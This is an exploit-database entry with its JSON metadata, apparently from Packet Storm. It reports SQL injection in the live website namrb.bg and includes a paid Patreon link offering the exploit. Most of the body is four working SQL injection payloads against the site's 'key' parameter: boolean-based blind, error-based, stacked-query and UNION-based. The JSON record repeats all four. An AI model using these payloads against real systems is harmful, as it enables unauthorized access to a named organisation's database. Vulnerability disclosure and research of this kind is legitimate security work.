📄 namrb.bg SQL Injection_PACKETSTORM:209542

Description

namrb.bg suffers from a remote SQL injection vulnerability. The owner of...

Basic Information

ID PACKETSTORM:209542

Published Sep 15, 2025 at 00:00

Affected Product

Affected Versions # Titles: namrb.bg app-Multiple-SQLi
# Author: nu11secur1ty
# Date: 09/15/2025
# Vendor: https://www.namrb.bg/
# Software: https://www.namrb.bg/
# Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `key` parameter appears to be vulnerable to SQL injection attacks. A
single quote was submitted in the cat parameter, and a database error
message was returned. Two single quotes were then submitted and the error
message disappeared. You should review the contents of the error message,
and the application's handling of other input, to confirm whether a
vulnerability is present.

STATUS: HIGH-CRITICAL Vulnerability

[+]Exploit:
- SQLi:

```SQLi
---
Parameter: key (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: year=0&cat=0'&key=')) OR NOT 2666=2666 AND
(('yXjW'='yXjW&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: year=0&cat=0'&key=')) OR (SELECT 4704 FROM(SELECT
COUNT(*),CONCAT(0x71707a7171,(SELECT
(ELT(4704=4704,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
(('nghM'='nghM&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: year=0&cat=0'&key='));SELECT
SLEEP(11)#&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5

Type: UNION query
Title: MySQL UNION query (UCHAR) - 23 columns
Payload: year=0&cat=0'&key=')) UNION ALL SELECT
'UCHAR','UCHAR','UCHAR','UCHAR',CONCAT(0x71707a7171,0x786a4a644251656873507a717a76504c50617258467463526e61716e766d7342414d41636e544153,0x7171766b71),'UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR'#&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5
---
```
##WARNING:
This has ALREADY been reported to the OWNER of this web application! If you
BUY THIS POST, YOU WILL BE AUTOMATICALLY RESPONSIBLE IN FRONT OF THE LAW!
THIS IS ONLY FOR THE OWNERS OF THIS WEB APPLICATION! THANK YOU!

# Reproduce:
[href](https://www.patreon.com/posts/namrb-org-sqli-138413412)

# Buy an exploit only:
[href](https://www.patreon.com/posts/namrb-org-sqli-138413412)

# Time spent:
00:15:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

{
    "lastseen": "2025-09-16T16:46:09",
    "description": "namrb.bg suffers from a remote SQL injection vulnerability. The owner of...",
    "published": "2025-09-15T00:00:00",
    "modified": "2025-09-15T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 namrb.bg SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:209542",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# Titles: namrb.bg app-Multiple-SQLi\n    # Author: nu11secur1ty\n    # Date: 09/15/2025\n    # Vendor: https://www.namrb.bg/\n    # Software: https://www.namrb.bg/\n    # Reference: https://portswigger.net/web-security/sql-injection\n    \n    ## Description:\n    The `key` parameter appears to be vulnerable to SQL injection attacks. A\n    single quote was submitted in the cat parameter, and a database error\n    message was returned. Two single quotes were then submitted and the error\n    message disappeared. You should review the contents of the error message,\n    and the application's handling of other input, to confirm whether a\n    vulnerability is present.\n    \n    STATUS: HIGH-CRITICAL Vulnerability\n    \n    \n    [+]Exploit:\n    - SQLi:\n    \n    ```SQLi\n    ---\n    Parameter: key (GET)\n        Type: boolean-based blind\n        Title: OR boolean-based blind - WHERE or HAVING clause (NOT)\n        Payload: year=0&cat=0'&key=')) OR NOT 2666=2666 AND\n    (('yXjW'='yXjW&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5\n    \n        Type: error-based\n        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP\n    BY clause (FLOOR)\n        Payload: year=0&cat=0'&key=')) OR (SELECT 4704 FROM(SELECT\n    COUNT(*),CONCAT(0x71707a7171,(SELECT\n    (ELT(4704=4704,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM\n    INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND\n    (('nghM'='nghM&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5\n    \n        Type: stacked queries\n        Title: MySQL >= 5.0.12 stacked queries (comment)\n        Payload: year=0&cat=0'&key='));SELECT\n    SLEEP(11)#&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5\n    \n        Type: UNION query\n        Title: MySQL UNION query (UCHAR) - 23 columns\n        Payload: year=0&cat=0'&key=')) UNION ALL SELECT\n    'UCHAR','UCHAR','UCHAR','UCHAR',CONCAT(0x71707a7171,0x786a4a644251656873507a717a76504c50617258467463526e61716e766d7342414d41636e544153,0x7171766b71),'UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR'#&s_search=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5\n    ---\n    ```\n    ##WARNING:\n    This has ALREADY been reported to the OWNER of this web application! If you\n    BUY THIS POST, YOU WILL BE AUTOMATICALLY RESPONSIBLE IN FRONT OF THE LAW!\n    THIS IS ONLY FOR THE OWNERS OF THIS WEB APPLICATION! THANK YOU!\n    \n    # Reproduce:\n    [href](https://www.patreon.com/posts/namrb-org-sqli-138413412)\n    \n    # Buy an exploit only:\n    [href](https://www.patreon.com/posts/namrb-org-sqli-138413412)\n    \n    # Time spent:\n    00:15:00\n    \n    \n    -- \n    System Administrator - Infrastructure Engineer\n    Penetration Testing Engineer\n    Exploit developer at https://packetstormsecurity.com/\n    https://cve.mitre.org/index.html\n    https://cxsecurity.com/ and https://www.exploit-db.com/\n    home page: https://www.nu11secur1ty.com/\n    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=\n                              nu11secur1ty <http://nu11secur1ty.com/>",
    "sourceHref": "https://packetstorm.news/download/209542",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/209542/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply